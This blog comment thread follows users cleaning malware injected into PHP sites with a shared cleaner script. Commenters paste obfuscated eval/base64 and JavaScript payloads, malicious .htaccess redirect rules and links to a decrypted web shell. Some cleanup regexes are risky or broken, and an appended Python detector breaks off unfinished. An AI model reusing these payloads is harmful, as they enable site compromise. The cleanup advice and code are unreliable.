    Many thanks guys!!! My site got infected today and I was able to fix the mess using your cleaner.php file (for which you’ll immediately receive a post in my blog – that’s the least I can do…). I think they’ve got through a WordPress vulnerability. What the virus appears to be doing is add spam links to the body of your pages. It seems it’s not doing anything else than that, although I wasn’t able to decrypt it all, so this is as far as I got… It’s still a mystery to me how they got in though, so even with the virus currently removed, I’m afraid it may happen again… Any advice?

    • Paolo says:

      Thank you Marin for sharing.

      That's what the usual malware does: it inserts a bunch of code, spam links and iframes on your home page and subpages. Yeah! It's still a mystery; only the masters know. Actually, I'd like to know that too (how they hack), so that I can defend my server somehow. But anyway, thanks Marin for your feedback; I'm happy that my little script helped you with your malware issue.

      If you guys have any problem with a different malware attack, let me know. I'll try to update my cleaner.php script so that it can clean other malware attacks, or if you have time you can modify and improve it. Thanks.

  5. Marin says:

    At this point, I have the virus decrypted (about 4000 lines of code) Anyone willing to help with this? (reading and understanding it)

    My advice so far is, disable the following functions from your php.ini:

    disable_functions = create_function,gzinflate,eval,base64_decode

    • Paolo says:

      That's good… hmmmm… Can I view it? Just give me a link.

      I'm not really sure that disabling gzinflate, eval, and especially base64_decode is a good idea.

  6. Poncho from mexico says:

    Seems a really 0day virus…

    there are no forums or mailing lists about this virus

    yes, what would be the countermeasures for this new virus/malware?

    disabling those functions that Marin mentioned wouldn't be good because WordPress uses those functions I believe….

    Regards,

  7. Marin says:

    You're right Poncho. WordPress uses all of these functions… I'm wondering if someone on the WordPress support forum will have any further ideas on this. Although I decoded 3 of the virus files I found, I'm almost sure I'm missing something… Has someone had a chance to look at the code I decrypted? Any luck understanding it fully? I'm pasting the links here quickly, so that you don't have to read the whole article on my blog:

    Malicious Code injected in every PHP file: http://pastebin.com/Wv9eqi7J (where “/home/marinbez/public_html/mediashare/cgi-bin/1bf.php” is the path to an include file containing more malicious code)

    1bf.php’s code (the filename is randomly generated): http://pastebin.com/SGJ74C6Y

    wp-thumb-creator.php’s code: http://pastebin.com/9gP3vgyH (looks like that’s one of the main virus files, but not the only one. it’s the one responsible for the PHP injection)

    SSHell v.1.0's code: http://pastebin.com/1qS8CyCF (that shell file is usually located in the same folder as the others. It's the file that allows the hackers to log into your server and cause trouble. I've intentionally commented out the authentication, so that you can see how it works without having to type a password)

  8. Karolis says:

    couple of days without sleeping… was reinstalling all WP blogs, was thinking what to do, and here it is, a simple script that cleans these viruses :)
    I would like to ask how many blogs it can scan? Because when I start it, it stops after some time.

  9. Karolis says:

    I fixed that problem by adding
    ini_set('memory_limit','128M');

    • Paolo says:

      Oh! Yeah! Exactly, you have to specify the memory limit. :) Sorry about that, I forgot to add that to the code. Thanks for letting me know about it. If possible, use "cleaner-cli.php" and run it on the command line, so you won't have a problem with setting up the memory limit. :D

      Basically, the script scans all PHP files, including the PHP files in sub-directories, so if you put "cleaner-cli.php" in your root directory, it eventually cleans everything: all PHP files down to the Nth sub-directory.

      I also suggest running the Malware Scanner ( http://www.php-beginners.com/wordpress-hack-malware-scanner.html ) that I recently created. You can view other potential hacking code, such as eval, c99madshell, and long_text. Again, I suggest running it on the command line. I might create an AJAX version of the cleaner and scanner scripts someday, so they won't take as much memory. I'll keep you all posted.

      Anyway, if you found bugs and errors, please do let me know. Thanks.

  10. Karolis says:

    Strange, but it is not finding the md5 code on subdomain blogs.

    • Paolo says:

      Can I see your file structure? It should be like this one:

      - \www
      |- \www\cleaner-cli.php
      |- \www\sub-domain-1.com\
      |- \www\sub-domain-2.com\
      |- ...
      |- \www\directoryX\directoryY\....

      Cleaner will try to open all the sub-directories and check all PHP files.

  11. Marin says:

    The issue has been recently reported on the WordPress forums: http://wordpress.org/support/topic/warning-tinymce-exploit

  12. My site’s also been infected. I’m on a shared server and don’t have command-line access, so I uploaded cleaner.php to the root directory and ran it from a browser.

    cleaner.php’s output was a nested list of files and directories with this line above it
    Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode in /var/www/vhosts/else.dnserver.net.nz/httpdocs/cleaner.php on line 2
    and the heading Found Files at the bottom.

    Do I need to do anything further with this output or has cleaner.php fully resolved everything?

    After running cleaner.php I manually deleted the two obviously bogus files fingered by the anti-virus application as they weren’t listed in the above report.

    Thanks,

    ::Leigh

    • Paolo says:

      Hello Leigh,

      Sorry for the late reply. I hope you have already fixed your site; in case not, I created cleaner version 2. You can download it above (in the post).

      Please let me know if there is still a problem. I'll be happy to help you.

      Thanks

      Regards,
      Paolo

  13. Frank Rapp says:

    Thank you for your great work! It helped me to fix that problem! :-)

  14. Ishtiyak says:

    Hello admin,
    my site was attacked with new malware… but your current script does not work because this code line is new… it is not found in my PHP…

    every PHP file includes this code line in the header

    eval(base64_decode("…"));

    can you tell me how to resolved it?

    Thanks advance

    • Ishtiyak says:

      I have just changed your $find code to the line below
      $find ="\s*eval\s*\([^\)]+\)\)\;";
      then ran this script…
      wow, it works for me… but I am afraid because I'm not good in PHP… so @Paolo if you can make sure there is nothing wrong in this code then it would be great… waiting for your reply…

      Thanks for creating great scripts…

      • Paolo says:

        Hi Ishtiyak,

        Nice, yes, the script is pretty clean and safe; there's nothing wrong with it.
        I'm not really sure why you replaced the $find value with "…eval\s*…"; that means
        you'll remove all "eval(.*)" calls in your PHP files?

        If that’s safe with your program, then we don’t have problem. :)

    • Paolo says:

      Oh! Sorry, I didn't notice this first comment.
      You can try this one:

      $find = "<\?php\s*eval\(\s*base64_decode\s*\(.*\)\s*);";

      Test this one first on a single file, then run it on all of your
      files if it's working fine. See the structure below for how to test on
      one file:

      /www/…/test/cleaner_2.0.php
      /www/…/test/infected-php-file.php

      Let me know.

      • Ishtiyak says:

        Thanks so much for your reply…

        this code does not work for me
        $find = "<\?php\s*eval\(\s*base64_decode\s*\(.*\)\s*);";
        it gives this error
        Warning: preg_match() [function.preg-match]: Compilation failed: unmatched parentheses at offset 43 in /***/**/cleaner2.php on line 161

        if at first we target '<?php eval', does it replace all '<?php' where it has 'eval', right?
        I'm asking about replacing <?php because it is infected like this…

        <div id="post-">
        it affects the starting code of every PHP file… also 2 tabs and 1 space, then eval() starts… so if <?php is removed the whole site stops working….

        I know it is pretty dangerous because I target all eval() functions… but when I try to add base64_decode() for safety then the same error shows…

        P.S: $find ="\s*eval\s*\([^\)]+\)\)\;"; this pretty dangerous code works with all my sites… (Joomla, WordPress, Magento + custom PHP) now they are fresh… because till now no error shows on the sites…

        Thanks

  15. Saje says:

    Hi,

    I am having the same exact problem as the poster above me with this code being injected to thousands of my files:

    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29..."));

    Would you mind possible updating your cleaner tool for fixing this malware code? Or tell me how I can update the one you posted above so that it works correctly?

    THANK YOU so much for your help. I’ve been dealing with this since October and am just getting this close!

  16. David says:

    First, I would like to thank Paolo; your cleaner.php script corrected most of the PHP files.

    But I still have quite a few PHP files that have this kind of code –

    <?php
    if(!function_exists('.......................'))...

    Is there any fix for that?
    Thank you.

    As this article indicates, malware is a major problem. Stopbadware.org reports that there are over 800,000 sites that are suffering from malware today. The process described above can be a very good set of tools to remove malware from your site, but in my experience it can come in many different and continuously innovative ways.

    So if the process seems to get too difficult, or if you have been infected multiple times, I can probably help.

    I have worked to help numerous clients recover their sites, as well as monitor their sites to prevent future attacks and downtime because of being marked as infested by google and other services.

    You can check out some of my WordPress Security and Malware Recovery Services.

  18. Mike says:

    Paolo,
    You saved my life with this script. Your script worked perfectly! Thank you so very much. I would love to buy you a meal if you have a way I could get you some money.
    Do you have any suggestions on how to stop this from happening again? All of the infected files have been removed and I’ve updated everything I can. Changed all passwords. Everything is working perfectly, Any other suggestions?
    Thanks again.

    • Paolo says:

      Hi Mike,

      You're welcome, I'm happy that my script helped you with that malware issue.
      My suggestion after cleaning up: if possible, change the username/password of your
      FTP, DB, WP login access, etc. Create a backup as well.

      Make sure your plugins, themes, and WordPress are on the latest version, because this is
      where they start hacking.

      You can also read this page:
      http://wordpress.org/tags/vulnerability

      It will give you information about WordPress vulnerabilities.

      Thanks again for the comment Mike. Hope you’ll have a great day! :)

      Paolo

  19. Hiddenaka says:

    Your cleaning scripts saved my life. Thank you so much!!!

  20. Wahyu says:

    Hi Paolo, thanks for your help… it's really helpful…
    but after cleaning is done, my website is unable to load and has an error message like this:

    "Parse error: syntax error, unexpected '}' in /… "

    could you help me what’s the problem..?

    Thank you very much

    • Paolo says:

      Hello Wahyu,

      Sorry for the late reply. I was so sick, the doctor advised me to take a break.
      Did you create a backup before you ran the cleaner script?

      What is your site?

      Let me know. Thanks.

      Paolo :)

  21. breaky says:

    thanks for your script!!

  22. Duncan says:

    Brilliant – thanks so much. Nice to know there are some good guys out there!

  23. Thank you so much for this script! Nightmare situation turned into easy resolution!

  24. jokomama says:

    hi there,

    can the script remove this kind of malware? It is mainly infecting index.php, but I have a lot of index.php files in various folders:

    if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){...}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[3.5,3.5,51.5,50,15,19,49,54...];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+n[j]));}q=ss;e(q);

    • Paolo says:

      Hello Jokomama,

      Unfortunately, it doesn't remove this kind of malware, but I can create a pattern for it. Just send me an email with 3 infected files to info@php-beginners.com.
      Thanks.

      Paolo

    • Paolo says:

      Hi Jokomama,

      I have checked your sites. You have a trojan script on your site.
      I have updated my cleaner to 2.4 version. You can download and test running it. Please do create a backup first before you run it.

      Let me know. Thanks.

      Paolo

      • jokomama says:

        Hi, I am going to test run it. Do you have any idea how this trojan virus works? How does it infect my sites? I am using shared hosting.

  25. jokomama says:

    Thank you buddy, emailed you

  26. Cris says:

    Hi Paolo,

    I found this hack today, please can you help me?

    Thank you.

    eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29udGVudD0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZzb2Nrb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeXNvY2tldF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICcnO30gIGZ1bmN0aW9uIHRyeWN1cmxfNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYnVmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9wZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTt9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9ICBmdW5jdGlvbiB0cnlmc29ja29wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QHBhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEkZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49
  27. Pingback: Not again... but maybe "never" again? - noted

  28. Dan says:

    Hi Paolo,

    I installed the “cleaner-cli_2.4” file into my root domain. What is the next step? It seems I should do more than just drop it in there. Please help.

    All my .htaccess files for all my domains are full of “rewrites.” There seems to be a malicious script running somewhere. Every time I delete the “rewrite code” in these .htaccess files, they come back within an hour.

    I’m hoping that the “cleaner-cli_2.4” file can clean up the hidden code. I just need to understand how to properly use it.

    Thanks!

    Dan

    • Paolo says:

      Hello Dan,

      Run it using shell terminal with this code:

      $ time php cleaner-cli_2.4.php 2>&1 >> cleaner_log

      I hope that helps. Just saw your site, you’ve been blocked because of the malware.

      If the script didn’t remove the malicious JavaScript code let me know.

      Paolo

  29. Dan says:

    What is shell terminal exactly?

    • Paolo says:

      It is a command-line user interface to the server. It is used to connect to the server and perform tasks on it
      by typing commands. It is equivalent to the DOS environment in Windows.
      https://ccrma.stanford.edu/guides/planetccrma/terminal.html

      Most hosting companies provide shell access; if not, you may use the Cleaner HTTP version.
      Just upload the file to your server and run it using your browser. See the instructions
      above.

      Thanks, let me know.

  30. Chris says:

    Paolo,

    Should this script work for http:// bannortimqimulta.ru/industry/index .php ? I just installed the script in my root folder and scanned the site but the bad code is still in all of the .htaccess files.

    Thanks!

  31. Dan says:

    Bluehost gives me shell access to use with my favorite SSH Client. What SSH Client do you recommend, and where can I get it?

  32. Happy Visitor says:

    Where is your donate link? Do you have a PayPal account? I really appreciate this script and would like to send you a thank you.

    • Paolo says:

      Wow… Thank you Happy Visitor. :D I really appreciate it. I never thought about this one. Thanks for encouraging me to create a better Malware Cleaner program. Big big thanks again. :D

      Have a great day! :D

  33. Dan says:

    Paolo,

    Concerning puTTY…

    After connecting with my username and hostname, I’m then prompted to enter my password, but it will not allow me to type it in. It will not allow ANY characters to be typed. You ever had trouble with this? Maybe there’s a setting I’m missing.

    Dan

  34. Ricardo says:

    Thanks, this solution was great!!

    It would be even better if you would have the same solution for magento. I got malicious code on wordpress and magento at the same time, but magento seems to be a little more pain in the ass to resolve..

    • Paolo says:

      I am sorry but this works on Magento as well or any php program. Just run the cleaner script. :) Sorry about that.

      Please make sure you create a backup of your files before you run the cleaner script, so that you can easily recover
      the files if something goes wrong. Let me know what I can help.

      Paolo

      • Ricardo says:

        Thanks Paolo, it worked perfectly on magento as well.

        Now I found this code at the bottom of my wordpress website and I want to remove from all .php files, how do I do this?

        Thanks

      • Ricardo says:

        For some reason it didn’t show the proper code that I need to remove, which is:

  35. I am so not technical, but I can’t afford help. My blogs are messed up. I’ve got the bizarre dashboard going on for all my blogs. I found your site and I am trying to run the script, but I may not have done it right. Here’s what I did:

    I downloaded the file, extracted it, uploaded it to my http://www.melissathinks.com folder via ftp. Then I went to my browser (chrome) and typed http://www.melissathinks.com/cleaner_2.4.php. The little circle spun for a really long time and then I got a 505 error.

    Did I do something wrong?

    Oh and thank you soooooo much for creating this! I have spent so many hours trying to figure out what the hell happened and trying to fix it and I literally ended up crying :-(

    • Paolo says:

      Oh! don’t worry Melissa, I’m here to help you. We’ll fix your blog.

      Actually, you did it right. I’m not really sure why the page throws 500 Internal Server error, maybe it’s because of your hosting
      php.ini configuration.

      Can you try to run my malware scanner (download and upload it to your server same thing you did on cleaner_2.4.php):
      http://www.php-beginners.com/wordpress-hack-malware-scanner.html

      and please send the scan result to info@php-beginners.com
      you can also add me on skype: oo70vd
      so that we can resolve your problem immediately.

      Let me know.

      Paolo

      • Paolo,
        You are right, it did work!!! I’m such a doofus. Last night before I went to sleep, way later than normal :-( I was reading on my ipad and I decided to take one more look at my destroyed dashboard and guess what? It looked fine! So this morning I got up all excited and went to check it out on my laptop, still no good. I cleared cache, still no good. Used firefox, still no good.

        So then I downloaded safari and it looked great!

        I haven’t learned a lot of techy stuff, but I do love the scientific method. So I sat over breakfast wondering why Apple products would be different and couldn’t come up with a reason other than they had NEVER accessed my dashboard before.

        So I went under the hood in chrome and instead of just telling it to clear cache, I cleared everything, passwords and all. And guess what?????

        My dashboard looks normal again!!! I did the same on firefox and it looks great there too. I don’t really give a crap about IE…I try never to use that browser :-)

        I wish I had found your blog so much earlier in the day yesterday, I would have saved so many tears :-) I’m heading over to your donate button now and I am going back to every forum that I went to yesterday to tell them about your amazing script!!!!

        Thank you from the bottom of my heart.

        Melissa

        • Paolo says:

          Thanks Melissa, that’s really nice to hear that your site is back to normal again. Your site looks great! Thank you also Melissa for the donation, big big thanks. :D

          If you have a problem with your site just let me know.

          Thanks again.

          Paolo :)

  36. Hi Admin
    Absolutely amazing code. Used that. Worked perfectly. Thank you so much. Please reply to me at sagar@clubhack.com & chmag.in. We would love to post your article in our magazine ClubHack Magazine.

    Thank You Again.

    Sagar Nangare
    ClubHack

  37. Pingback: Hacked Off | Inner Quests

  38. Lekshmi says:

    Thanks for your help. We have downloaded the cleaner_2.4 file and executed it via browser from the root folder, which removed all the virus scripts. I have edited something in that code to change the file execute permission. I just added this code: chmod($dir."/".$file,0444);

  39. Dan says:

    Hey guys,

    Maybe I need to add this code too… chmod($dir."/".$file,0444);

    When I’m running the cleaner_2.4 file, my page doesn’t come up. You can try it here… http://www.dbdrumtips.com/cleaner_2.4.php

    Where exactly in the cleaner_2.4.php file do I need to place chmod($dir."/".$file,0444);

    Thanks!

    Dan

  40. Dan says:

    Paolo,

    I can proceed to the root domain with no trouble. It’s just that when I try to proceed with http://www.dbdrumtips.com/cleaner_2.4.php is when it just will not open. I just get, “Website Offline, No Cached Version Available.”

    I tried the CLI version, but puTTY would not let me type in my password.

    What do you advise?

    Thanks!

    Dan

  41. Dan says:

    Paolo,

    I can proceed to dbdrumtips.com with no difficulty. It’s when I proceed to dbdrumtips.com/cleaner_2.4.php that I have trouble. I get “Website Offline, No Cached Version Available.”

    I tried the CLI version, but puTTY would not let me type in my password. It just seems to freeze.

    Your cleaning tools would be a dream come true if I could just get them to work for me. Can you advise me further? I appreciate your help!

    Dan

  42. Don Reed says:

    If I upload the cleaner into a specific directory (not the root) will it just clean the files in that directory?
    I wanted to test it before applying to the whole site.
    I have an infected Joomla site. I am assuming it will work for this.

    Thanks

    • Paolo says:

      Yes that’s right, it will just clean all the files in that directory. It works well on Joomla too. Make sure you backup your files before you run the script.
      Just to make sure. :)

      Let me know.

  43. Rodrigo says:

    Hello, my site was WordPress with this problem. I backed up everything and fixed the virus problem, but now when entering the site in IE it is misaligned to the left. I have since updated WordPress and the theme and uploaded some files such as CSS, to no avail. Please help me. In other browsers like Chrome and Firefox it works normally.

    http://www.clubdofitness.com.br

  44. Rodrigo says:

    Hello, my site was WordPress with this problem. I backed up everything and fixed the virus problem, but now when entering the site in IE it is misaligned to the left. I have since updated WordPress and the theme and uploaded some files such as CSS, to no avail. Please help me. In other browsers like Chrome and Firefox it works normally; the lightbox also only works in IE and not in the others.
    http://www.clubdofitness.com.br

    • Paolo says:

      Hello Rodrigo,

      I have checked your site; you have a great site. It really looks great on FF 10.0.2 and Chrome 17.0.963.56 m but on IE 8 it’s not.
      Don’t worry, I will fix that asap. I’ll keep you posted.

      Paolo

    • Paolo says:

      Hi Rodrigo,

      Wow, this is really difficult to locate this type of error.
      Actually, this is my first time.
      http://www.php-beginners.com/images/2012-03-02_2201.png

      I think the file is:
      /wp-content/themes/fitness/header.php

      Just modify the file. The <!DOCTYPE html> looks like a normal less than (<) symbol but the (<) is not. That’s why you have to replace it by typing less than (<).

      Let me know, maybe I’m wrong, but it works fine on my browser.

      Regards,
      Paolo

  45. Victoria says:

    I LOVE YOU! Thanks for sharing this with the world. It has saved me tons of time :-)
    I’m going straight to the “Donate” button, you deserve it!!

    Will you consider keeping the cleaner updated? :-) )

    • Paolo says:

      Big big Thanks Victoria, I received your donation already. Thanks again.
      Yes, I will keep this updated.

      Thank you again Victoria. Have a great day!

      Paolo :)

  46. Dan says:

    Paolo,

    I’ve added you on Skype, and sent you a message.

    Dan

  47. Rena says:

    This was the code that was in all of my .php files
    Unfortunately, I started manually removing it in Dreamweaver, before I found your cleaner…I just ran it and I’m hoping it worked! I have to wait for my site to go back online ( I took it down, so the malware wouldn’t mess with anyone else’s system)
    Thanks so much!
    ~Rena~

    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6c..."));
    • Paolo says:

      Hi Rena,

      The cleaner script can totally remove that malware code.
      This malware code redirects your visitors to another site (costabrava.bee.pl)

      I hope it has been removed already. Let me know.

      Thanks,
      Paolo :)

      • Rena says:

        Hey Paolo!
        It just did it again…almost a month later (worst.day.ever.)…I’m gonna run the scanner again! It worked last time :) Then I’m going to change all my log-ins, etc.

        Thank You…Again, hehe,
        ~Rena~

  48. Excellent weblog here! Additionally your site quite a bit up very fast! What host are you the usage of? Can I get your affiliate link on your host? I desire my web site loaded up as fast as yours lol

  49. haris says:

    hello sir..

    I did a scan using cleaner_2.4.php and it shows 0 Found Infected Files..

    However, when I scan my website using sucuri.net it shows Site infected with malware.

    And how do I use Cleaner CLI 2.4 with the command prompt..

    Do I need to open cmd.exe and insert the code that you gave above, or extract the zip file and open it with cmd and insert the code?

    thank you in advance.

    • Paolo says:

      I see, when I click your site from the Google search result
      it redirects me to the hacker’s web page – (Do not visit the site: massage-pool.ru/mysave/index.php). This leads to losing visitors to your site and badly affects your SEO work. We need to stop this attack asap.

      Is it okay if you’ll send to me your .htaccess and index.php files to info@php-beginners.com? I will check it and see what I can do to remove it.

      Thanks. Let me know.

      Paolo

      • haris says:

        I already sent you the .htaccess and index.php files. Please check your email from goodigi2011@gmail.com

        thank you again.

        • Paolo says:

          Hello Haris,

          I got your email. Your “.htaccess” file is infected, you have to delete the code from lines 1-16.
          The malicious code that was inserted in your “.htaccess” redirects your visitors to the hacker’s site (massage-pool.ru)

          Below is the malicious code. You have to delete these lines of code.

          <IfModule mod_rewrite.c>
          RewriteEngine On
          RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
          RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
          RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
          RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
          </IfModule>

          Let me know.

          Paolo

          • haris says:

            thank you for your reply..

            I already deleted all of that before, but it appears again after an hour. It doesn’t matter what I do, it will appear again in .htaccess.

          • Hello Paolo,

            I’m having the exact same situation. The site is redirecting to the same massage-pool. I’m deleting the lines from the .htaccess file but like haris, they come back after an hour or so.

            I have only run the cleaner via the website option. When I run the cleaner via the CLI it says “could not open input file.”

            Anything you can do would be great. We’re going on 24 hours of infection and I can’t get it out.

            Take care,

            - Mark

          • Paolo says:

            Hi Mark and Haris,

            We need to figure out where and what file is writing back the malware code again.

            Here’s what we are going to do. Can you run a malware scan on your site. Just download and run the file (see link below) and send the scan result to info@php-beginners.com

            http://www.php-beginners.com/wordpress-hack-malware-scanner.html

            Let me know. Thanks.

            Paolo
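The rule set Paolo quotes above is a referrer-gated redirect: a RewriteCond on HTTP_REFERER matching search engines and social sites, followed by a RewriteRule to an absolute URL on another host, so the site owner who types the address directly never sees it. The following is an added example, not the cleaner script or any code from this thread: it parses a .htaccess text, pairs each RewriteRule with the RewriteCond lines directly above it, and reports only rules that send visitors to an external host under a referrer condition, leaving WordPress's own permalink rules alone. The sample .htaccess, the placeholder redirect host and the SITE_HOSTS allowlist are constructed for the demo.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the rules quoted above, with the redirect
# target replaced by a placeholder host.  The first block is WordPress's own
# permalink rule set and must not be flagged.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|facebook|twitter)\\.(.*)
RewriteRule ^(.*)$ http://redirect-host.invalid/mysave/index.php [R=301,L]
</IfModule>
"""

# Hosts the site legitimately redirects to (constructed allowlist).
SITE_HOSTS = {"example.com", "www.example.com"}

COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def find_referrer_redirects(text: str, site_hosts=SITE_HOSTS):
    """Return one finding per RewriteRule that sends the visitor to an
    external absolute URL and is gated by a RewriteCond on HTTP_REFERER."""
    findings = []
    pending = []  # RewriteCond lines waiting for their RewriteRule
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        cond = COND_RE.match(line)
        if cond:
            pending.append((lineno, cond.group(1), cond.group(2)))
            continue
        rule = RULE_RE.match(line)
        if not rule:
            pending = []  # a RewriteCond only applies to the next RewriteRule
            continue
        conds, pending = pending, []
        target = rule.group(2)
        parsed = urlparse(target)
        external = parsed.scheme in ("http", "https") and parsed.hostname not in site_hosts
        referrer_gated = any(var.upper() == "%{HTTP_REFERER}" for _, var, _ in conds)
        if external and referrer_gated:
            findings.append({
                "line": lineno,
                "target": target,
                "flags": rule.group(3) or "",
                "conditions": [(ln, pat) for ln, _, pat in conds],
            })
    return findings


def lines_to_remove(findings):
    """Sorted line numbers of every flagged rule plus the conditions above it,
    i.e. the span Paolo told Haris to delete."""
    nums = set()
    for f in findings:
        nums.add(f["line"])
        nums.update(ln for ln, _ in f["conditions"])
    return sorted(nums)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HTACCESS
    found = find_referrer_redirects(text)
    for f in found:
        print(f"line {f['line']}: redirect to {f['target']} [{f['flags']}] "
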